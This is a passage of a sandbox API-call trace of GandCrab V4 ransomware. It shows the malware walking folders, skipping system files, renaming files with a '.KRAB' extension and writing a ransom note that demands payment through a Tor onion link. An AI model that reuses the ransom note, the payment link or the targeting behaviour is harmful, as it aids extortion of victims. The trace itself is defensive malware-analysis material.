lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.196] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.196] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\d2ca4a08d2ca4dee3d.lock" [0100.196] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.196] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 71 [0100.196] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\d2ca4a08d2ca4dee3d.lock") returned 66 [0100.197] lstrlenW (lpString=".lock") returned 5 [0100.197] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.197] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.197] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.197] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.198] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0100.198] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0100.198] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0100.198] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Internet Explorer" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0100.198] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" [0100.198] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.198] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.198] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.198] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.198] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.198] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.198] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.199] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\KRAB-DECRYPT.txt") returned 78 [0100.199] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0100.199] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.199] WriteFile (in: hFile=0x778, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.200] CloseHandle (hObject=0x778) returned 1 [0100.200] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.201] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.201] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x193)) [0100.201] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.201] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.201] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.201] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a08d2ca4dee3d.lock") returned 84 [0100.201] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x778 [0100.256] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.256] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.257] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 61 [0100.257] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0100.257] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbdae0 [0100.257] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.257] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0100.257] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0100.257] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.257] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0100.257] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.257] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.257] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a08d2ca4dee3d.lock" [0100.257] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.257] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 89 [0100.257] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a08d2ca4dee3d.lock") returned 84 [0100.257] lstrlenW (lpString=".lock") returned 5 [0100.257] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.258] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.258] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.258] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.258] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0100.258] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.258] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.258] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\KRAB-DECRYPT.txt" [0100.258] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.259] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\KRAB-DECRYPT.txt.KRAB") returned 82 [0100.259] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\KRAB-DECRYPT.txt") returned 77 [0100.259] lstrlenW (lpString=".txt") returned 4 [0100.259] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.269] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.269] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.270] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\KRAB-DECRYPT.txt") returned 77 [0100.270] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\KRAB-DECRYPT.txt") returned 77 [0100.270] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.270] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.270] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.270] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.270] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.270] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.270] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.270] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.270] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.270] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.270] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.270] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0100.270] lstrcmpW (lpString1="Quick Launch", lpString2=".") returned 1 [0100.271] lstrcmpW (lpString1="Quick Launch", lpString2="..") returned 1 [0100.271] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="Quick Launch" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0100.271] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" [0100.271] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.275] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.275] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.275] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.275] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.275] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.275] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.276] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\KRAB-DECRYPT.txt") returned 91 [0100.276] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0100.278] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.278] WriteFile (in: hFile=0x43c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.279] CloseHandle (hObject=0x43c) returned 1 [0100.279] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.279] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.280] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x1e2)) [0100.280] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.282] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.282] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: 